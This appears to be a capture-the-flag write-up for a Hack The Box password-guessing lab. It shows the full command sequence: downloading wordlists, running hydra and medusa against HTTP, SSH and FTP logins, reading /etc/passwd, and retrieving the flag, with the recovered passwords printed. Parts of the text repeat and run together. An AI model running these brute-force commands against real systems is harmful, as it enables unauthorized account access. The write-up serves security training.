LOGIN BRUTE FORCING 1 & 2
OBJECTIVE: brute-force the the target instance and upon successful identification of the login username, proceed to skills assessment part 2.
Last updated
OBJECTIVE: brute-force the the target instance and upon successful identification of the login username, proceed to skills assessment part 2.
Last updated
#download username lists
root@htb:~$ curl -s -O https://raw.githubusercontent.com/danielmiessler/SecLists/refs/heads/master/Usernames/top-usernames-shortlist.txt
#download password lists
root@htb:~$ curl -s -O https://raw.githubusercontent.com/danielmiessler/SecLists/refs/heads/master/Passwords/2023-200_most_used_passwords.txt
root@htb:~$ hydra -L top-usernames-shortlist.txt -P 2023-200_most_used_passwords.txt 83.136.250.185 http-get / -s 57229 -t 64
* 57229][http-get] host: 83.136.250.185 login: admin password: Admin123
root@htb:~$ curl -u admin:'Admin123' 83.136.250.185:57229
* <p>This is the username you will need for part 2 of the Skills Assessment<span class="flag">satwossh</span></p>#download password lists
root@htb:~$ curl -s -O https://raw.githubusercontent.com/danielmiessler/SecLists/refs/heads/master/Passwords/2023-200_most_used_passwords.txt
root@htb:~$ medusa -h 83.136.254.160 -n 43615 -u satwossh -P 2023-200_most_used_passwords.txt -M ssh -t 32
* ACCOUNT FOUND: [ssh] Host: 83.136.254.160 User: satwossh Password: password1 [SUCCESS]
* ALT: hydra -l satwossh -P 2023-200_most_used_passwords.txt 83.136.254.160 -s 43615 ssh
- 43615][ssh] host: 83.136.254.160 login: satwossh password: password1
root@htb:~$ ssh [email protected] -p 43615
* password1
satwossh@target:~$ netstat -natup | grep -i LISTEN
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::21 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
satwossh@target:~$ which nmap
satwossh@target:~$ nmap localhost
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
satwossh@target:~$ ls /home
satwossh@target:~$ cat /etc/passwd
* thomas:x:1001:1001::/var/.hidden:/bin/bash
satwossh@target:~$ ls
* IncidentReport.txt passwords.txt username-anarchy
satwossh@target:~$ cat IncidentReport.txt
System Logs - Security Report
Date: 2024-09-06
Upon reviewing recent FTP activity, we have identified suspicious behavior linked to a specific user. The user **Thomas Smith** has been regularly uploading files to the server during unusual hours and has bypassed multiple security protocols. This activity requires immediate investigation.
All logs point towards Thomas Smith being the FTP user responsible for recent questionable transfers. We advise closely monitoring this user’s actions and reviewing any files uploaded to the FTP server.
Security Operations Team
satwossh@target:~$ hydra -l thomas -P passwords.txt -V localhost ftp
* [21][ftp] host: localhost login: thomas password: chocolate!
satwossh@target:~$ ftp ftp://thomas:'chocolate!'@localhost
* MUST enclose the password in quotes if it contains special characters
ftp> help
ftp> ls
* flag.txt
ftp> more flag.txt
* HTB{brut3f0rc1ng_succ3ssful} #download password lists
root@htb:~$ curl -s -O https://raw.githubusercontent.com/danielmiessler/SecLists/refs/heads/master/Passwords/2023-200_most_used_passwords.txt
root@htb:~$ medusa -h 83.136.254.160 -n 43615 -u satwossh -P 2023-200_most_used_passwords.txt -M ssh -t 32
* ACCOUNT FOUND: [ssh] Host: 83.136.254.160 User: satwossh Password: password1 [SUCCESS]
* ALT: hydra -l satwossh -P 2023-200_most_used_passwords.txt 83.136.254.160 -s 43615 ssh
- 43615][ssh] host: 83.136.254.160 login: satwossh password: password1
root@htb:~$ ssh [email protected] -p 43615
* password1
satwossh@target:~$ netstat -natup | grep -i LISTEN
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::21 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
satwossh@target:~$ which nmap
satwossh@target:~$ nmap localhost
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
satwossh@target:~$ ls /home
satwossh@target:~$ cat /etc/passwd
* thomas:x:1001:1001::/var/.hidden:/bin/bash
satwossh@target:~$ ls
* IncidentReport.txt passwords.txt username-anarchy
satwossh@target:~$ cat IncidentReport.txt
System Logs - Security Report
Date: 2024-09-06
Upon reviewing recent FTP activity, we have identified suspicious behavior linked to a specific user. The user **Thomas Smith** has been regularly uploading files to the server during unusual hours and has bypassed multiple security protocols. This activity requires immediate investigation.
All logs point towards Thomas Smith being the FTP user responsible for recent questionable transfers. We advise closely monitoring this user’s actions and reviewing any files uploaded to the FTP server.
Security Operations Team
satwossh@target:~$ hydra -l thomas -P passwords.txt -V localhost ftp
* [21][ftp] host: localhost login: thomas password: chocolate!
satwossh@target:~$ ftp ftp://thomas:'chocolate!'@localhost
* MUST enclose the password in quotes if it contains special characters
ftp> help
ftp> ls
* flag.txt
ftp> more flag.txt
* HTB{brut3f0rc1ng_succ3ssful}